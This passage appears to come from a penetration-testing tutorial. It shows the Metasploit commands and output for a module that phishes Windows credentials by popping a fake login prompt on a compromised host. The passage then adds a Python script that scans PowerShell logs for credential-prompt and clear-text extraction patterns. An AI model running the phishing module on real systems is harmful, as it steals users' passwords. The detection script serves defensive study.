To harvest credentials, we will use the Windows Gather User Credentials post-exploitation module, which performs a phishing attack on the target by popping up a login prompt.
- When the user types his/her credentials into the login prompt, they will be sent to our attacker machine:
    msf > use post/windows/gather/phish_windows_credentials
    msf post(phish_windows_credentials) > set SESSION 1
    SESSION => 1
    msf post(phish_windows_credentials) > run
    [+] PowerShell is installed.
    [*] Starting the popup script. Waiting on the user to fill in his credentials...
    [+] #< CLIXML
- On the target machine, we should see the login prompt, waiting for the user to fill in his/her credentials:
- When the user fills in the login prompt, ...
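
A defender-side companion to the steps above, added here and not part of the original text or of Metasploit: because the module output shows that the prompt is driven by a PowerShell popup script, this example triages PowerShell script-block logging records (event ID 4104) for credential-prompt calls. The JSON record layout, the indicator patterns and the sample lines are constructed assumptions.

```python
import json
import re

# Credential-prompt calls a PowerShell popup script can use (assumed indicator list).
PROMPT = re.compile(r"PromptForCredential|Get-Credential|CredUIPromptFor", re.I)
# Converting the captured credential back into a clear-text password.
PLAINTEXT = re.compile(
    r"GetNetworkCredential\s*\(\s*\)|SecureStringToBSTR|PtrToStringAuto", re.I
)

# Constructed sample records shaped like exported script-block events, one JSON per line.
SAMPLE_LOG = """\
{"EventID": 4104, "Computer": "WS01", "ScriptBlockText": "$c = $Host.UI.PromptForCredential($title, $msg, $user, $domain); $p = $c.GetNetworkCredential().Password"}
{"EventID": 4104, "Computer": "WS02", "ScriptBlockText": "$cred = Get-Credential; Invoke-Command -ComputerName srv01 -Credential $cred -ScriptBlock { hostname }"}
{"EventID": 4104, "Computer": "WS03", "ScriptBlockText": "Get-ChildItem | Sort-Object Length"}
{"EventID": 4103, "Computer": "WS01", "ScriptBlockText": "Get-Credential"}
"""


def triage(lines):
    """Return (computer, severity) for each 4104 record that prompts for credentials."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip damaged lines rather than abort the hunt
        if rec.get("EventID") != 4104:
            continue  # only script-block logging records carry the script text
        text = rec.get("ScriptBlockText", "")
        if not PROMPT.search(text):
            continue
        # A prompt followed by clear-text extraction is the phishing pattern;
        # a prompt whose credential object is only passed on is common admin use.
        severity = "high" if PLAINTEXT.search(text) else "review"
        findings.append((rec.get("Computer", "?"), severity))
    return findings


if __name__ == "__main__":
    for computer, severity in triage(SAMPLE_LOG.splitlines()):
        print(f"{computer}: {severity}")
```

Large scripts are logged as several 4104 fragments, so reassemble them by script block ID before matching on real exports.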